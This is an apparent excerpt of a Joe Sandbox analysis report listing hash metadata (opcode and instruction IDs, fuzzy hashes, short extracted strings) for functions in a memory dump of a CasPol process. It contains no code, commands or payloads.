                                                                                  • Opcode Fuzzy Hash: c73ce18e47deb4b3874db41efa80e4de84a056aef6c66d7159e38716e215b47e
                                                                                  • Instruction Fuzzy Hash: 2A717AB2E047098FDB50CFA8C9857EEBBF6BF88714F508129E404A7250DB759846CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \VSn$\VSn
                                                                                  • API String ID: 0-668133529
                                                                                  • Opcode ID: 1caee6769878fdd0d16df6cf693d71282d45ec9a1e6fa9cc1459f1e8b1a2054d
                                                                                  • Instruction ID: 0e3f9a0a18fff4b48550926e415482e16f03828b37ba2b0916c9bbeb8e380d00
                                                                                  • Opcode Fuzzy Hash: 1caee6769878fdd0d16df6cf693d71282d45ec9a1e6fa9cc1459f1e8b1a2054d
                                                                                  • Instruction Fuzzy Hash: 14717A72E047098FDB50CFA9C9817EEBBF2BF88714F508129E405A7254EB749846CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #&,P^$3&,P^
                                                                                  • API String ID: 0-1786835295
                                                                                  • Opcode ID: de4378247274800d1b31a7e13957f0232f12edad6e12dd7dae9ab6cd48d4572f
                                                                                  • Instruction ID: 727c91df12b88138ad680dd15f802478c3c28d0270bf0d47338ac294c6d77ce4
                                                                                  • Opcode Fuzzy Hash: de4378247274800d1b31a7e13957f0232f12edad6e12dd7dae9ab6cd48d4572f
                                                                                  • Instruction Fuzzy Hash: F7510536B187508FCB40FB78D0552AD7BF2AF89204B864929C24ADB350DF74995ACF93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X-l$X-l
                                                                                  • API String ID: 0-3094341571
                                                                                  • Opcode ID: f5e0f83fb7e08638d77a6532ad02509280c5047ee9d41d884a0d4649e27fe0c4
                                                                                  • Instruction ID: 35e0e5f3f9141fc5c9e5b8e6210a5facea1ad8aa123a898a103cff7d7750d3df
                                                                                  • Opcode Fuzzy Hash: f5e0f83fb7e08638d77a6532ad02509280c5047ee9d41d884a0d4649e27fe0c4
                                                                                  • Instruction Fuzzy Hash: BF419EB270476A4BD7894675489237A77EAABC4200F86C23AC969CB3C1DB74CC45DB53
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tQgn$tQgn
                                                                                  • API String ID: 0-2482053849
                                                                                  • Opcode ID: b313a747daff7cdc6acc603c5556b2bed6bc12033981f296b6e813f38162974f
                                                                                  • Instruction ID: 88a9c1c60010db28119ed98ea174e7110b2988d5d9164ddd06f932d0d92a54cf
                                                                                  • Opcode Fuzzy Hash: b313a747daff7cdc6acc603c5556b2bed6bc12033981f296b6e813f38162974f
                                                                                  • Instruction Fuzzy Hash: 37418771C00748DFDB50CFA5C5A97DDBFB4AF0A325FA08429D409AB280C7B62885CF52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X-l$X-l
                                                                                  • API String ID: 0-3094341571
                                                                                  • Opcode ID: 5d9963124e87bd2e8976d95f64c8341894ff056f08e1b6f8432f867bcae5117d
                                                                                  • Instruction ID: 22ba995154dbd7bff90817fe79eff59fe4797f6f87e95e6887302624d5424311
                                                                                  • Opcode Fuzzy Hash: 5d9963124e87bd2e8976d95f64c8341894ff056f08e1b6f8432f867bcae5117d
                                                                                  • Instruction Fuzzy Hash: 3211ADF270471A07DBC5456505422B6939AAFC5114F95C23BCAADCB284DF71CC45EAA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH)l
                                                                                  • API String ID: 0-2491596382
                                                                                  • Opcode ID: f67db27c9bd7396ddf4dee4dea3880d2a678fb0a456d04174825345c57b5939e
                                                                                  • Instruction ID: 575e5b65921b2099489936c33baf145cdf424ceb4ab62e2c9866038ea0d7a69c
                                                                                  • Opcode Fuzzy Hash: f67db27c9bd7396ddf4dee4dea3880d2a678fb0a456d04174825345c57b5939e
                                                                                  • Instruction Fuzzy Hash: 55327F74A002288FCB54DF74CCA87AEB7B6AF89304F504499D80AA7784DF71AEC58F55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH)l
                                                                                  • API String ID: 0-2491596382
                                                                                  • Opcode ID: ddd33e7de33457bdb7be6fab527c62db7c8723d49bb7931074221b6f6bab4571
                                                                                  • Instruction ID: e2530b8f83284efd6526df0af36b6a232c74312517b9ca6c58d550ba091046f1
                                                                                  • Opcode Fuzzy Hash: ddd33e7de33457bdb7be6fab527c62db7c8723d49bb7931074221b6f6bab4571
                                                                                  • Instruction Fuzzy Hash: B5328174A002288FCB54DF74CCA87AEB7B6AF89304F504499D80AA7784DF71AEC58F55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d8.l
                                                                                  • API String ID: 0-4034604863
                                                                                  • Opcode ID: 0281534e282fcc924e2cf9a8c1942adf690b14c4c237266c641083589837ec7c
                                                                                  • Instruction ID: a14b6f89cb7f1c81eef8356b2e2d5d971d2da1e2d712f2ee7d94ed6132027e53
                                                                                  • Opcode Fuzzy Hash: 0281534e282fcc924e2cf9a8c1942adf690b14c4c237266c641083589837ec7c
                                                                                  • Instruction Fuzzy Hash: 3661A032B006198FCB44DFA8C445AED77B2BF88711F958169E906AB390CB30DC81CF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: f426c2ebe207c756e5b6acbc89ff8e60947c339e2f312c6b00c5aae42ec43f49
                                                                                  • Instruction ID: 6c225c4694480165a414d929f73ebd5f0f304dd34d718380d4cb8c73288fe6fe
                                                                                  • Opcode Fuzzy Hash: f426c2ebe207c756e5b6acbc89ff8e60947c339e2f312c6b00c5aae42ec43f49
                                                                                  • Instruction Fuzzy Hash: 4251D335F003159FDB449FB898982AE77B2AF8A214F508538E80AD7784DF74C84A8B49
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: e26241e75c46da77a5d32d87206622893e3f1484876dbfa410365325b0e7d472
                                                                                  • Instruction ID: 5d94ef2c090f2268f401fe8451cb41eedab8416ca32b6dea27ce83b51ead901e
                                                                                  • Opcode Fuzzy Hash: e26241e75c46da77a5d32d87206622893e3f1484876dbfa410365325b0e7d472
                                                                                  • Instruction Fuzzy Hash: E541C134F103149FDB459FB588A85AE77B3AFCA214B10C438E806D7784DF34C84A8B89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d8.l
                                                                                  • API String ID: 0-4034604863
                                                                                  • Opcode ID: 17697b4f84759ddf4cd541abda5997ded5ef800282cfe30541f0397e2cd7a43b
                                                                                  • Instruction ID: 6dcac102f225f916ec18617bd3f9c7200c4bc062953157de6be6f4f8d3456950
                                                                                  • Opcode Fuzzy Hash: 17697b4f84759ddf4cd541abda5997ded5ef800282cfe30541f0397e2cd7a43b
                                                                                  • Instruction Fuzzy Hash: 16412332308B418FC310DB34C495B6ABBB1AF85204F458AA8E59ACF6B1CB30DC41CF82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH)l
                                                                                  • API String ID: 0-2491596382
                                                                                  • Opcode ID: cf36c46dbf982acdcb7ac5f3a0766dff227c50a81d180d6ca1f129b26a3118df
                                                                                  • Instruction ID: 5dcd9a072155016c0fcf02d8eb1d0be77c47720482f7b6ab82a5dbe58d88f03f
                                                                                  • Opcode Fuzzy Hash: cf36c46dbf982acdcb7ac5f3a0766dff227c50a81d180d6ca1f129b26a3118df
                                                                                  • Instruction Fuzzy Hash: 1C31D735B002189BDB04DBB4889976F7BB2AF89255F044828E906EB380DF34DC81DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: d3d31df156829cd7e07ade9ad31e036c5f108d77d889083b75e3bf7418438268
                                                                                  • Instruction ID: e187ce9d1168daca4540c2c276a3927370594e8b225616ef8b3352072d15586e
                                                                                  • Opcode Fuzzy Hash: d3d31df156829cd7e07ade9ad31e036c5f108d77d889083b75e3bf7418438268
                                                                                  • Instruction Fuzzy Hash: BE0128317082505FC7059BB488256DEBBB6AFCB200F0544ABC205CB7A2DF31AC49CBA7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: 16214e1845cd1e887bee6850c287fbb94f08b1fbc6836097bcb6903facfd1b0a
                                                                                  • Instruction ID: ebfcdd16dc1ae925d7d53657d1cae80fe6a8472dcff5923bda72306b7c0cb76d
                                                                                  • Opcode Fuzzy Hash: 16214e1845cd1e887bee6850c287fbb94f08b1fbc6836097bcb6903facfd1b0a
                                                                                  • Instruction Fuzzy Hash: 5801D635B042105FC7059BB8C4246EDB7A6EFCA201B15856BC10ACBB95DF71EC49CBA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4')l
                                                                                  • API String ID: 0-1666011671
                                                                                  • Opcode ID: ac93788cbaafc6144732f574b94047e57184175b64294fc7da3d331009d3ab85
                                                                                  • Instruction ID: 5007c60a70c1f9b2148809ac858a0177c88986a30e1f3f59bace3caf94ff2f4f
                                                                                  • Opcode Fuzzy Hash: ac93788cbaafc6144732f574b94047e57184175b64294fc7da3d331009d3ab85
                                                                                  • Instruction Fuzzy Hash: 3EF06D30905309EFCB04DFB4E9A54CCBBB0AF4A204B5041E9C908EB251DB306E19CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4')l
                                                                                  • API String ID: 0-1666011671
                                                                                  • Opcode ID: 176c38d457fe39097a901c49c51df3ede81367704cb2848f2c27ee493aef058e
                                                                                  • Instruction ID: a311efea80ec80620d799ca6ec3929d29258deebd54ecff98aff8c88b4999615
                                                                                  • Opcode Fuzzy Hash: 176c38d457fe39097a901c49c51df3ede81367704cb2848f2c27ee493aef058e
                                                                                  • Instruction Fuzzy Hash: 14F08C30E0130EEFCB04EFB4D99548CBBB0AB45204F5045A8C509EB210EB306E09CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tQgn
                                                                                  • API String ID: 0-684793199
                                                                                  • Opcode ID: 26047c395a532a7d4b099074050913248dbdd9acfc058debf2bf24ec57096066
                                                                                  • Instruction ID: 966f1a2271990755eec4831e6814db45038c1e3d89e18722c7e1c76d608e8e23
                                                                                  • Opcode Fuzzy Hash: 26047c395a532a7d4b099074050913248dbdd9acfc058debf2bf24ec57096066
                                                                                  • Instruction Fuzzy Hash: C6E06D72D08709DBDB55CF60C9A97ED7BB1AB023A3F904528C006A61D1DF762985CF83
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `fn
                                                                                  • API String ID: 0-4196747816
                                                                                  • Opcode ID: f416da482e1b8438f2b2a1880f2a0175c3d5d83d0dde354f9fcee5161a512b0b
                                                                                  • Instruction ID: 44a624674304a01c3263be79d52d8d16360d8fab8197692214762f76822b2ba0
                                                                                  • Opcode Fuzzy Hash: f416da482e1b8438f2b2a1880f2a0175c3d5d83d0dde354f9fcee5161a512b0b
                                                                                  • Instruction Fuzzy Hash: B4E09275014714EBC7018F51E2A66847BB87B02314F808149C4080B2A2D3B2B5AD8FD3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `fn
                                                                                  • API String ID: 0-4196747816
                                                                                  • Opcode ID: 3d92834dc9d551c79f3203fc3e7b525f6f748178f8eb97099d7b700967b1a346
                                                                                  • Instruction ID: 01792cb2fbdef51500b755c01f45ca43a02bc3c248368279ac972c3281fa4571
                                                                                  • Opcode Fuzzy Hash: 3d92834dc9d551c79f3203fc3e7b525f6f748178f8eb97099d7b700967b1a346
                                                                                  • Instruction Fuzzy Hash: 56D05E75028328DBC7009B66D2A8B093BA9A746329F80C55CD4080B2A6C7B3F4598FC3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 500cc41833775fa0c1274805ae1a298372c776eaa684ae061a6a962bc249a3f6
                                                                                  • Instruction ID: ecc2a0eb042ff230456919740fd685d6c198d70fe169b88ff0a1a87302219383
                                                                                  • Opcode Fuzzy Hash: 500cc41833775fa0c1274805ae1a298372c776eaa684ae061a6a962bc249a3f6
                                                                                  • Instruction Fuzzy Hash: 9802C775901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 62450faec6af7470c197a5cf762a5dc065cd670730afb24e189d34610807ab04
                                                                                  • Instruction ID: 1cd321488b5c41a2d16b281dc49cc1d70586bdfd670a9a7630ca011bba351df7
                                                                                  • Opcode Fuzzy Hash: 62450faec6af7470c197a5cf762a5dc065cd670730afb24e189d34610807ab04
                                                                                  • Instruction Fuzzy Hash: 5902C875901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 32698d5b019c8a7c5e90038b632ba614e3cfd944ff17021fbdd6f6a21c472526
                                                                                  • Instruction ID: ec826bb4f02310026c8926c90accb60e1c671247b086a14afe6fc7aefcc5d716
                                                                                  • Opcode Fuzzy Hash: 32698d5b019c8a7c5e90038b632ba614e3cfd944ff17021fbdd6f6a21c472526
                                                                                  • Instruction Fuzzy Hash: 3BB1A435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b3a880cd3cca96baacf557d3c5588f0b227887be3e59884e9a35d9890b724db7
                                                                                  • Instruction ID: 334b95b9ef3cc7b785267854f87a3b135f1458c7d3d3d7f6fed5008a226b2eeb
                                                                                  • Opcode Fuzzy Hash: b3a880cd3cca96baacf557d3c5588f0b227887be3e59884e9a35d9890b724db7
                                                                                  • Instruction Fuzzy Hash: 60B1A435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 848dec2cb9a9cb655274993977a03fb36f20f8767f353a5f074d55a02fb140db
                                                                                  • Instruction ID: 8d25ee1db448ffd6ddfd4a21f202d1804e71f500b901516868ed6341799815ef
                                                                                  • Opcode Fuzzy Hash: 848dec2cb9a9cb655274993977a03fb36f20f8767f353a5f074d55a02fb140db
                                                                                  • Instruction Fuzzy Hash: 89B1A535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58984effe3417a172d7a024c9f63c12c723c16a72f72bc80589532c6527a5e9
                                                                                  • Instruction ID: 06f1bfd0328b3ea3f7ea095e8c16f308efbf83d376e4541155bb32d8fad351b3
                                                                                  • Opcode Fuzzy Hash: c58984effe3417a172d7a024c9f63c12c723c16a72f72bc80589532c6527a5e9
                                                                                  • Instruction Fuzzy Hash: 7FA1A435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1bacce1483719b7f1c50a27ea299eb88d1cdf1c86bd73ec0bf73c5ae7fd621c3
                                                                                  • Instruction ID: 3c0e321885c69031ba3d0ab9fc2baf253f46994a698c49dcbf243c4c2b891d4b
                                                                                  • Opcode Fuzzy Hash: 1bacce1483719b7f1c50a27ea299eb88d1cdf1c86bd73ec0bf73c5ae7fd621c3
                                                                                  • Instruction Fuzzy Hash: F9A1A535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddfd095f278ef95c227518b9998120a7e71d76a9b25ea05713cbcebf1a44b4f9
                                                                                  • Instruction ID: 93b97bb6622dcb6890bfa62efc865ef9aad673b83117ca4adb7cc058a20287d2
                                                                                  • Opcode Fuzzy Hash: ddfd095f278ef95c227518b9998120a7e71d76a9b25ea05713cbcebf1a44b4f9
                                                                                  • Instruction Fuzzy Hash: 3BA1B435905328CFCBA5EF20D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20e1eb0917233a8650587b3a64f15ab6a36076723dfc62414d74b2db847831fc
                                                                                  • Instruction ID: 6296577a9135fc08facf1b9041fd75f8cfdadf8f8a69d382c3e97e7e574f5d45
                                                                                  • Opcode Fuzzy Hash: 20e1eb0917233a8650587b3a64f15ab6a36076723dfc62414d74b2db847831fc
                                                                                  • Instruction Fuzzy Hash: A391B535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 83675f4736f320f99130183fde066fd6e5c60487a8e6fffeec3158baaaf333cd
                                                                                  • Instruction ID: 7b1c7328fb065a27694180560764039b58cb829f5aa78b3967eb0cc7af3d3854
                                                                                  • Opcode Fuzzy Hash: 83675f4736f320f99130183fde066fd6e5c60487a8e6fffeec3158baaaf333cd
                                                                                  • Instruction Fuzzy Hash: D991B435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

